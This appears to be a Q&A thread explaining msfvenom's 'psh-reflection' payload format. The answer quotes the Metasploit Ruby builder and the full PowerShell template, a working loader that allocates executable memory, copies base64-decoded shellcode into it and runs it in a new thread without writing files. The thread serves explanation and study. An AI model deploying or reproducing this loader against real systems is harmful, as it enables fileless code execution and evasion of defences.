# What is the different between "psh-reflection" and psh (msfvenom format)?

Tags: msfvenom

In "Framework Executable Formats" in msfvenom i see some options (psh,psh-cmd,psh-net,psh-reflection)
in this article https://docs.rapid7.com/metasploit/the-payload-generator/ I see some explanation on the differences between psh and psh-cmd  but what is it is psh-reflection and where I can find an explanation on the rest, I didn't see any documentation on this (https://www.offensive-security.com/metasploit-unleashed/msfvenom/)

Answer (score 1):

The `psh-reflection` payload is implemented by the `to_win32pe_psh_reflection` function in the [rex-powershell](https://github.com/rapid7/rex-powershell) module. If you take a look at the [payload.rb](https://github.com/rapid7/rex-powershell/blob/master/lib/rex/powershell/payload.rb#L57) file, you'll see the following code that builds the reflection payload:

```
  #
  # Reflection technique prevents the temporary .cs file being created for the .NET compiler
  # Tweaked by shellster
  # Originally from PowerSploit
  #
  def self.to_win32pe_psh_reflection(template_path = TEMPLATE_DIR, code)
    # Intialize rig and value names
    rig = Rex::RandomIdentifier::Generator.new(DEFAULT_RIG_OPTS)
    rig.init_var(:func_get_proc_address)
    rig.init_var(:func_get_delegate_type)
    rig.init_var(:var_code)
    rig.init_var(:var_module)
    rig.init_var(:var_procedure)
    rig.init_var(:var_unsafe_native_methods)
    rig.init_var(:var_parameters)
    rig.init_var(:var_return_type)
    rig.init_var(:var_type_builder)
    rig.init_var(:var_buffer)
    rig.init_var(:var_hthread)
    rig.init_var(:var_opf)

    hash_sub = rig.to_h
    hash_sub[:b64shellcode] = Rex::Text.encode_base64(code)

    read_replace_script_template(template_path, "to_mem_pshreflection.ps1.template",hash_sub).gsub(/(?<!\r)\n/, "\r\n")
  end
```

This references a template Powershell file, which can be found [here](https://github.com/rapid7/rex-powershell/blob/master/data/templates/to_mem_pshreflection.ps1.template). It looks like this:

```
function %{func_get_proc_address} {
    Param ($%{var_module}, $%{var_procedure})       
    $%{var_unsafe_native_methods} = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
    
    return $%{var_unsafe_native_methods}.GetMethod('GetProcAddress', [Type[]]@([System.Runtime.InteropServices.HandleRef], [String])).Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($%{var_unsafe_native_methods}.GetMethod('GetModuleHandle')).Invoke($null, @($%{var_module})))), $%{var_procedure}))
}

function %{func_get_delegate_type} {
    Param (
        [Parameter(Position = 0, Mandatory = $True)] [Type[]] $%{var_parameters},
        [Parameter(Position = 1)] [Type] $%{var_return_type} = [Void]
    )
    
    $%{var_type_builder} = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
    $%{var_type_builder}.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $%{var_parameters}).SetImplementationFlags('Runtime, Managed')
    $%{var_type_builder}.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $%{var_return_type}, $%{var_parameters}).SetImplementationFlags('Runtime, Managed')
    
    return $%{var_type_builder}.CreateType()
}

[Byte[]]$%{var_code} = [System.Convert]::FromBase64String("%{b64shellcode}")
        
$%{var_buffer} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll VirtualAlloc), (%{func_get_delegate_type} @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]))).Invoke([IntPtr]::Zero, $%{var_code}.Length,0x3000, 0x40)
[System.Runtime.InteropServices.Marshal]::Copy($%{var_code}, 0, $%{var_buffer}, $%{var_code}.length)

$%{var_hthread} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll CreateThread), (%{func_get_delegate_type} @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr]))).Invoke([IntPtr]::Zero,0,$%{var_buffer},[IntPtr]::Zero,0,[IntPtr]::Zero)
[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll WaitForSingleObject), (%{func_get_delegate_type} @([IntPtr], [Int32]))).Invoke($%{var_hthread},0xffffffff) | Out-Null
```

Putting this together, we can figure out what this payload type does. You provide some shellcode to execute, and it wraps it in a Powershell script. The script allocates some unmanaged memory, decodes the shellcode from base64, copies it into the allocated memory, then generates a dynamic assembly with a method that executes the payload.

A benefit of this method is that it doesn't need to drop any additional files when it executes. The dynamic assembly exists only in memory.